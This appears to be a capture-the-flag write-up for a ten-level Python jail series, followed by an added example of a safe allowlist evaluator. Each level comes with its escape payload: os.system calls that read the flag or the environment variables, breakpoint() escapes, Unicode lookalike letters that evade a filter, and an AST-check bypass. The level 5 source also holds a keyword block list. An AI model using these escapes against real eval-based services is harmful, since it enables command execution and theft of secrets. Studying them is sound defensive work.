Level 1
Learn to read the environment variables.
__import__("os").system('cat /proc/self/environ');
Level 2
The source is provided, so read it first.
WELCOME = '''
_ _______ _______ _ ____
| | | ____\ \ / / ____| | |___ \
| | | _| \ \ / /| _| | | __) |
| |___| |___ \ V / | |___| |___ / __/
|_____|_____| \_/ |_____|_____| |_____|
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
try:
    print("Result: {}".format(eval(input_data)))
except Exception as e:
    print(f"Result: {e}")
The source is not much help here.
__import__("os").system('cat flag')
Level 3
WELCOME = '''
_ _______ _______ _ _____
| | | ____\ \ / / ____| | |___ /
| | | _| \ \ / /| _| | | |_ \
| |___| |___ \ V / | |___| |___ ___) |
|_____|_____| \_/ |_____|_____| |____/
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if len(input_data) > 13:
    print("It's too long to eval")
    exit(0)
try:
    print("Result: {}".format(eval(input_data)))
except Exception as e:
    print(f"Result: {e}")
eval(input())
open("flag").read()
Level 4
The server prints "It's too long to eval".
This should be a limit on the length of the input string.
WELCOME = '''
_ _______ _______ _ _ _
| | | ____\ \ / / ____| | | || |
| | | _| \ \ / /| _| | | | || |_
| |___| |___ \ V / | |___| |___ |__ _|
|_____|_____| \_/ |_____|_____| |_|
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if len(input_data) > 12:
    print("It's too long to eval")
    exit(0)
try:
    print("Result: {}".format(eval(input_data)))
except Exception as e:
    print(f"Result: {e}")
First use breakpoint() to break out of the main function,
then enter open("flag").read() to get the flag.
Level 5
These functions are banned, but the same approach as in level 4 still works.
WELCOME = '''
_ _______ _______ _ ____
| | | ____\ \ / / ____| | | ___|
| | | _| \ \ / /| _| | | |___ \
| |___| |___ \ V / | |___| |___ ___) |
|_____|_____| \_/ |_____|_____| |____/
'''
black = ["input", "import", "os", "open", "popen", "system", "read", "_", "'", "\""]
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if any([i in input_data for i in black]):
    print("Ohhhh, what are you doing???!!!")
    exit(0)
try:
    print("Result: {}".format(eval(input_data)))
except Exception as e:
    print(f"Result: {e}")
First use breakpoint() to break out of the main function,
then enter open("flag").read() to get the flag.
Level 6
ASCII letters are banned, but other Unicode letter forms can be used to call breakpoint().
from string import ascii_letters
WELCOME = '''
_ _______ _______ _ __
| | | ____\ \ / / ____| | / /_
| | | _| \ \ / /| _| | | | '_ \
| |___| |___ \ V / | |___| |___ | (_) |
|_____|_____| \_/ |_____|_____| \___/
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
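if any([i in ascii_letters for i in input_data]):
    print("Ohhhh, what are you doing???!!!")
    exit(0)
try:
    print("Result: {}".format(eval(input_data)))
except Exception as e:
    print(f"Result: {e}")
Here I use the site https://lingojam.com/ItalicTextGenerator to convert the text, then enter the converted breakpoint(),
followed by open("flag").read()
Level 7
No source is given this time.
After connecting with nc, this is the screen that appears.
This is probably a guess-the-function challenge.
So the idea is to read the file and then print it.
Open the file with os.open, then read it with os.read; __import__('io').open("flag").read() also works, of course.
payload:
__import__("sys").stdout.write(__import__("os").read(__import__("os").open("flag",__import__("os").O_RDONLY), 0x114).decode())
Level 8
Input with no result echoed back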
WELCOME = '''
_ _______ _______ _ ___
| | | ____\ \ / / ____| | ( _ )
| | | _| \ \ / /| _| | | / _ \
| |___| |___ \ V / | |___| |___ | (_) |
|_____|_____| \_/ |_____|_____| \___/
'''
print WELCOME
print "Welcome to the python jail"
print "This program will repeat your messages"
# Python 2: input() evaluates the entered text as an expression
input_data = input("> ")
print input_data
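Level 9
No source is given, so analyze the challenge first.
After pressing g, the AST must not contain the following:
But the check can be bypassed directly.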
@exec
@input
class X: pass
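Then just append the required --CBCTF at the end.
After that, get the flag in the easiest way available (open does not work here).
Final level (level 10)
I did not read the challenge; breakpoint() solved it immediately.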
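Added example (not part of the original write-up or the challenge author's code): why the level 6 letter filter accepts input that Python still reads as an ASCII identifier, next to an allowlist evaluator that supports only the arithmetic the banner advertises. The names level6_filter_passes, safe_eval, MAX_LEN and SAMPLE are hypothetical, and SAMPLE is a constructed input.

```python
import ast
import operator
import unicodedata
from string import ascii_letters

# Allowlist (assumption): the only operators a "1 + 1" calculator needs.
BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv,
           ast.Mod: operator.mod}
UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_LEN = 64  # assumed limit, applied to the normalized text

# Constructed sample: "breakpoint()" spelled with Mathematical Sans-Serif
# Italic letters (U+1D622 onward), the kind of text an italic generator emits.
SAMPLE = "".join(chr(0x1D622 + ord(c) - ord("a")) for c in "breakpoint") + "()"


def level6_filter_passes(text):
    """The level 6 check as written: reject only when an ASCII letter appears."""
    return not any(ch in ascii_letters for ch in text)


def walk(node):
    """Evaluate one AST node if, and only if, its type is on the allowlist."""
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
        return BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](walk(node.operand))
    # Names, calls, attributes, subscripts, ** and everything else end here.
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_eval(text):
    """Evaluate +, -, *, /, % over numeric literals without calling eval()."""
    # Python folds identifiers with NFKC, so inspect the text in that form.
    text = unicodedata.normalize("NFKC", text)
    if len(text) > MAX_LEN:
        raise ValueError("expression too long")
    return walk(ast.parse(text, mode="eval").body)


if __name__ == "__main__":
    print(level6_filter_passes(SAMPLE))         # the letter filter accepts it
    print(unicodedata.normalize("NFKC", SAMPLE))  # what the parser will see
    print(safe_eval("-3 * (2 + 4) / 2"))
```

Because the evaluator never calls eval() and rejects every node type it does not recognize, length limits and keyword blacklists like those in levels 3 to 5 are no longer the only barrier.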